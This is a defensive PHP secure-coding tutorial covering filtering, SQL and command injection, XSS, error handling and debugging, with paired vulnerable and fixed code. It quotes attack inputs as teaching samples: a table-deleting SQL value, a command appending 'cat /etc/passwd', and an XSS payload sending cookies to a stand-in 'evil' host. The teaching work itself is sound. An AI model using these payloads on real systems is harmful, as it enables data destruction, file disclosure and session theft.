PART VI: Secure, Optimize, Debug

In this section I will cover:
Data filtering
SQL injection
Command injection
XSS
Safe mode
Coding Standards
Error logging
Debugging and optimization
Data Filtering
Users are evil, and sometimes they don't even know it. Treat every piece of user-supplied data as tainted and filter it before you use it; PHP provides lots of functions that can help here.
Never rely on register_globals. In fact, if you're writing for redistribution, undo its effects if it is on.
How data should be filtered depends on what you need to do with it. You will rarely need "raw" data. Most of the time it needs to be validated on the way in and then escaped for a particular purpose on the way out: display, insertion into a database, use in a shell command, and so on. Validation and escaping are two separate steps, and the escaping depends on the destination.
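As an added example (not code from the original deck), here is what "taint and filter" looks like in practice: undo register_globals if it is on, then validate each request value against what the script actually expects, returning null for anything else. The request array, the field names and the allowed sort values are constructed for the example.

```php
<?php
// Added example: treat every input as tainted, validate it against what you
// expect, and only then use it. Escaping for SQL/shell/HTML is a separate
// step at each of those sinks.

// Undo register_globals if it happens to be on (old PHP). Any variable that
// arrived through a request superglobal is removed from the global scope.
if (ini_get('register_globals')) {
    $sources = array($_SERVER, $_ENV, $_FILES, $_COOKIE, $_POST, $_GET);
    if (isset($_SESSION)) {
        array_unshift($sources, $_SESSION);
    }
    foreach ($sources as $source) {
        foreach ($source as $name => $value) {
            unset($GLOBALS[$name]);
        }
    }
}

// Whitelist validation: return the cleaned value, or null when it does not match.
function clean_int($value, $min = 0, $max = PHP_INT_MAX) {
    // Rejects "1; DELETE ...", "12abc", "+1", leading/trailing whitespace.
    // At most 18 digits so the value always fits a 64-bit integer.
    if (!is_string($value) || !preg_match('/^\d{1,18}\z/', $value)) {
        return null;
    }
    $n = (int) $value;
    return ($n >= $min && $n <= $max) ? $n : null;
}

function clean_email($value) {
    // filter_var() is available from PHP 5.2 onwards.
    $email = filter_var($value, FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

function clean_choice($value, array $allowed) {
    // Strict comparison: "0" must not be accepted because it loosely equals 0 or false.
    return in_array($value, $allowed, true) ? $value : null;
}

// Constructed request values, standing in for $_GET / $_POST (assumed field names).
$request = array('id' => '42', 'email' => 'user@example.com', 'sort' => 'date');

$id    = clean_int($request['id'], 1);
$email = clean_email($request['email']);
$sort  = clean_choice($request['sort'], array('date', 'name'));

if ($id === null || $email === null || $sort === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid input');
}
// $id, $email and $sort are now known-good values of known types. They still
// need context-specific escaping (or bound parameters) before reaching a
// query, a shell command or the HTML output.
```

The point of returning null rather than a "cleaned up" guess is that the script refuses bad input instead of silently repairing it: an id of "1; DELETE FROM USER" is rejected outright, not truncated to 1.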
SQL Injection
SQL injection occurs when improperly filtered data ends up in a database query:

"SELECT * FROM USER WHERE ID = $id"
$id = "1; DELETE FROM USER;"

With that value the statement becomes SELECT * FROM USER WHERE ID = 1; DELETE FROM USER; and, on a driver that allows stacked queries, the table is emptied. Even where stacked queries are refused, a value such as 1 OR 1=1 still changes what the query returns.

Most DBMS modules have their own escaping mechanisms:

mysql_real_escape_string(): escapes according to the character set of the current connection, so it needs an open connection
addslashes(): the "swiss army knife" approach; generic and charset-unaware, and not a substitute for the DBMS-specific function

Escaping only covers quoted string values; an unquoted numeric value like the $id above must be cast or validated instead. Where the driver supports them, prepared statements with bound parameters are the better option: the data never becomes part of the SQL text at all.
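As an added example (not code from the original deck), the vulnerable query from the slide is shown next to a prepared-statement fix, with the legacy escaping approach alongside for comparison. The table and column names follow the slide; the SQLite in-memory database and its two rows are constructed for the demonstration.

```php
<?php
// Added example: the query from the slide, vulnerable and fixed.

// VULNERABLE: the value is interpolated straight into the SQL text.
// With $id = "1 OR 1=1" every row is returned; with "1; DELETE FROM USER"
// a driver that allows stacked queries would empty the table.
function find_user_vulnerable(PDO $db, $id) {
    $sql = "SELECT * FROM USER WHERE ID = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIX 1: prepared statement. The parameter is sent separately from the SQL
// text, so there is nothing to escape. Casting to int also enforces the type.
function find_user(PDO $db, $id) {
    $stmt = $db->prepare('SELECT * FROM USER WHERE ID = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// FIX 2: driver-specific escaping with the old mysql_* API (removed in PHP 7).
// The escaping function takes the connection so it knows the connection
// charset; addslashes() does not, which is why it can be bypassed with some
// multibyte charsets. Quoting the value in the SQL is still your job, and
// this only works for string values, never for unquoted numbers.
function find_user_by_name_legacy($link, $name) {
    $safe = mysql_real_escape_string($name, $link);
    $sql  = "SELECT * FROM USER WHERE NAME = '$safe'";
    return mysql_query($sql, $link);
}

// Demonstration against an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE USER (ID INTEGER PRIMARY KEY, NAME TEXT)');
$db->exec("INSERT INTO USER VALUES (1, 'alice'), (2, 'bob')");

$attack = '1 OR 1=1';
echo count(find_user_vulnerable($db, $attack)), " rows from the vulnerable query\n";
echo count(find_user($db, $attack)), " rows from the prepared statement\n";
```

Run with the attack string, the vulnerable function returns both rows because the WHERE clause has become ID = 1 OR 1=1, while the prepared statement casts the input to 1 and returns only alice.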

Command Injection
Command injection takes place when improperly filtered input ends up in a shell command.
Both the command and its parameters should be escaped, each with the function meant for it:
escapeshellcmd($cmd)   neutralises shell metacharacters in the command string
escapeshellarg($arg)   wraps one argument in single quotes (escaping any embedded ones) so the shell passes it as a single word
shell_exec($cmd . ' ' . $arg)
Running escapeshellcmd() over a complete command line is not enough on its own: it does not escape spaces, so an attacker can still append extra arguments. Apply escapeshellarg() to every argument separately, and where possible avoid the shell altogether by validating the input against a whitelist.
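As an added example (not code from the original deck), here is a small line-counting script that shells out to wc, first in its injectable form and then hardened with the two escaping functions plus a path restriction. The request parameter name and the upload directory are assumptions.

```php
<?php
// Added example: command injection in a wc(1) wrapper, and the fix.

$file = isset($_GET['file']) ? $_GET['file'] : '';   // assumed parameter name

// VULNERABLE: $file = "notes.txt; cat /etc/passwd" runs a second command,
// and "$(id)" or backticks are expanded by the shell before wc ever runs.
// $output = shell_exec("wc -l " . $file);

// HARDENED, step 1: restrict what the argument can refer to at all.
// basename() drops any directory part, so "../../etc/passwd" becomes "passwd"
// and the file must live inside the directory we control.
$base = '/var/www/uploads';                 // assumed upload directory
$path = $base . '/' . basename($file);
if ('' === $file || !is_file($path)) {
    header('HTTP/1.1 404 Not Found');
    exit('No such file');
}

// HARDENED, step 2: escape the command and the argument separately.
$cmd = escapeshellcmd('/usr/bin/wc');   // neutralises shell metacharacters in the command
$arg = escapeshellarg($path);           // single-quotes the value; embedded quotes are escaped

// "--" ends option parsing, so even a value starting with "-" cannot be
// read as an option by wc. escapeshellarg() only stops the shell from
// re-parsing the value; it does nothing about option injection.
$output = shell_exec($cmd . ' -l -- ' . $arg);

// Output is data too: escape it for the HTML context it is shown in.
echo htmlspecialchars(trim((string) $output), ENT_QUOTES, 'UTF-8');
```

The whitelist check does most of the work here; the escaping is defence in depth for the case where a later edit relaxes the check.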
Cross-site Scripting
XSS happens when improperly escaped input is output to the client. XSS can be used for all sorts of nasty purposes (stealing session cookies, defacing pages, performing actions in the victim's session). Often underrated, it is an extremely serious security problem, and it is usually easy to exploit on the attacker's side.
User input needs to be properly escaped before being output back to the browser, using the function that matches the output context:

htmlspecialchars()  converts &, <, > and " (and ' with ENT_QUOTES); the usual choice for HTML text and attribute values
htmlentities()      like htmlspecialchars() but converts every character that has a named HTML entity
strip_tags()        removes tags; it is a filter, not an escaping function, and leaves attribute and JavaScript contexts unprotected
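As an added example (not code from the original deck), a page that reflects a search term back to the user, showing the vulnerable echo, why strip_tags() does not fix it, and the correct escaping for the three contexts the term lands in (HTML text, an attribute value, and a JavaScript literal). The parameter name is an assumption.

```php
<?php
// Added example: reflected XSS and context-specific escaping.

function h($s) {
    // ENT_QUOTES also escapes single quotes, so the result is safe inside both
    // double- and single-quoted attributes. The charset must match the page's
    // declared charset, otherwise the escaping can be bypassed.
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

$q = isset($_GET['q']) ? $_GET['q'] : '';   // assumed parameter name

// VULNERABLE: $q = '<script>document.location="http://evil/?"+document.cookie</script>'
// is sent back verbatim and executes in every victim's browser.
// echo "<p>Results for " . $q . "</p>";

// strip_tags() is not a fix either: $q = '" onmouseover="alert(1)' contains no
// tag, survives it untouched, and breaks out of the value="" attribute below.
// echo '<input value="' . strip_tags($q) . '">';
?>
<!DOCTYPE html>
<meta charset="utf-8">

<!-- HTML text and attribute contexts: htmlspecialchars() with ENT_QUOTES -->
<p>Results for <?php echo h($q); ?></p>
<input type="text" name="q" value="<?php echo h($q); ?>">

<script>
// JavaScript context: HTML escaping is the wrong encoding here. json_encode()
// emits a quoted JS string literal; the JSON_HEX_* flags (PHP 5.3+) hex-escape
// <, >, &, " and ' so the literal cannot terminate the <script> block either.
var query = <?php echo json_encode($q, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS); ?>;
</script>
```

A single escaping helper used everywhere is the practical way to make this hold across a code base; the dangerous pattern is any echo of request data that does not go through it.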
Safe Mode
Safe mode implements certain restrictions intended to prevent security problems, mainly UID matching (a script may only touch files owned by the same user as the script itself) and open_basedir restrictions (file access is confined to a directory tree).
Safe mode and open_basedir have several drawbacks:
PHP is not the right place for implementing security at this level; process and file-system separation belong in the operating system and web server configuration. Safe mode was deprecated in PHP 5.3 and removed in 5.4.
Files created under safe_mode may not be readable by your scripts, because they end up owned by the web server user rather than the script owner.
The checks add noticeable overhead to the system.

Coding Standards

• Coding standards help you write good code
• There is no "official" coding standard for PHP
• A few ideas:
  • Flatten nested if statements
  • Split long statements across multiple lines
  • Use variable substitution ("Hello $name") instead of concatenation where it reads better
  • Watch out for performance hits
  • Comparison vs. assignment: reverse comparisons (put the constant on the left, 'admin' === $role) so a mistyped = becomes a parse error instead of a silent bug
  • Use type-sensitive comparisons (===) whenever possible; loose == converts types and makes "0", false and "" look alike
  • Validate resources: check the return value of fopen(), mysql_connect() and similar calls before using it
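As an added example (not code from the original deck), here are three of the points above in working code: reversed comparisons, type-sensitive comparisons, and validating a resource before using it. The config-file format is a constructed key=value format for the example.

```php
<?php
// Added example: reversed comparisons, strict comparisons, resource validation.

// Reverse comparison: with the constant on the left, the classic typo
// "if ($role = 'admin')" (assignment, always true) becomes a parse error.
function is_admin($role) {
    return 'admin' === $role;
}

// Type-sensitive comparison: strpos() returns 0 for a match at offset 0, and
// 0 == false in PHP, so the loose version reports "no match" for exactly the
// case it should accept.
function starts_with_loose($haystack, $needle) {
    return strpos($haystack, $needle) != false;   // wrong for a match at offset 0
}
function starts_with($haystack, $needle) {
    return strpos($haystack, $needle) === 0;
}

// Loose comparison converts both operands: '0' == false, '1e3' == '1000' and
// '0e123' == '0e456' are all true because numeric strings compare as numbers.
// The last one matters when comparing hashes: use === (or hash_equals()).
function same_token($expected, $given) {
    return is_string($given) && $expected === $given;
}

// Validate resources: fopen() returns false on failure, and every later call
// on that "handle" fails too. Check before use instead of trusting it.
function read_config($path) {
    $fh = fopen($path, 'r');
    if (!is_resource($fh)) {
        throw new RuntimeException("Cannot open $path");
    }
    $data = array();
    while (($line = fgets($fh)) !== false) {      // fgets() returns false at EOF
        $line = trim($line);
        if ('' === $line || '#' === $line[0]) {
            continue;                            // skip blank lines and comments
        }
        // explode() with a limit of 2 keeps any "=" inside the value intact;
        // the array union supplies an empty value for lines without "=".
        list($key, $value) = explode('=', $line, 2) + array(1 => '');
        $data[trim($key)] = trim($value);
    }
    fclose($fh);
    return $data;
}
```

The starts_with pair is the one worth remembering: the loose form is a real-world bug pattern in access checks that compare a path or prefix, and === fixes it without any other change.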
Error Management
PHP has an impressive array of error management facilities; use them!
• Report all errors during development (error_reporting(E_ALL) with display_errors on)
• Keep error reporting on in production, but shift from displaying to logging (display_errors off, log_errors on): error messages reveal file paths, queries and library versions to an attacker
• Implement your own error handlers (set_error_handler(), set_exception_handler()) so that nothing is silently ignored and the log carries the context you need
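As an added example (not code from the original deck), an error-handling bootstrap that applies those three points: full reporting in both environments, display versus logging switched by environment, and custom handlers that convert PHP errors into exceptions and log fatals at shutdown. The APP_ENV variable and the log path are assumptions.

```php
<?php
// Added example: error reporting for development vs. production, plus
// custom handlers. APP_ENV and the log path are assumptions.

$production = (getenv('APP_ENV') === 'production');

error_reporting(E_ALL);                              // report everything, in both modes
ini_set('display_errors', $production ? '0' : '1');  // show on screen only in development
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log');        // assumed path, writable by the web server

// Convert PHP errors into exceptions so they cannot be ignored, and log them
// with the request context an incident responder needs.
function app_error_handler($errno, $errstr, $errfile, $errline) {
    if (!(error_reporting() & $errno)) {
        return false;   // suppressed with @, let PHP's standard handling continue
    }
    error_log(sprintf('[%d] %s in %s:%d (uri=%s ip=%s)',
        $errno, $errstr, $errfile, $errline,
        isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '-',
        isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-'));
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
}

function app_exception_handler($e) {
    error_log(get_class($e) . ': ' . $e->getMessage() . ' in ' . $e->getFile() . ':' . $e->getLine());
    if (!headers_sent()) {
        header('HTTP/1.1 500 Internal Server Error');
    }
    // Stack traces, SQL and file paths stay in the log, never in the response.
    echo $GLOBALS['production']
        ? 'Something went wrong.'
        : htmlspecialchars((string) $e, ENT_QUOTES, 'UTF-8');
}

set_error_handler('app_error_handler');
set_exception_handler('app_exception_handler');

// Fatal errors (E_ERROR, E_PARSE, ...) bypass set_error_handler(); the
// shutdown function is the last chance to get them into the log.
register_shutdown_function(function () {
    $err = error_get_last();
    if ($err !== null
        && in_array($err['type'], array(E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR), true)) {
        error_log(sprintf('FATAL: %s in %s:%d', $err['message'], $err['file'], $err['line']));
    }
});

// Demonstration: reading a missing array key used to be a notice that scrolled
// past unnoticed; it is now a logged exception the code has to deal with.
try {
    $config = array();
    $value = $config['missing'];
} catch (ErrorException $e) {
    echo 'Caught: ', htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8'), "\n";
}
```

The important line for production is display_errors = 0 with log_errors = 1: the errors are still reported, they just go to a file the attacker cannot read instead of the response body.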

Debugging
• Debugging can be very difficult
• "Echo" debugging is the simplest form: output status throughout the script's execution (and remove it before deploying, since it leaks internals to users)
• Complex logic is better handled through external debuggers
• Lots are available, from open source (Xdebug) to commercial (e.g. Zend Studio IDE)
• IDEs support both local and remote debugging
Optimization
• Optimization can be as simple as installing a bytecode cache: no changes to the codebase, immediate (but limited) benefits
• Proper optimization requires good analysis: find the bottlenecks first by profiling rather than guessing
• Optimization can take place on multiple levels:
  • Write faster code
  • Remove external bottlenecks
  • Use caching for internal bottlenecks
  • Improve web server configuration
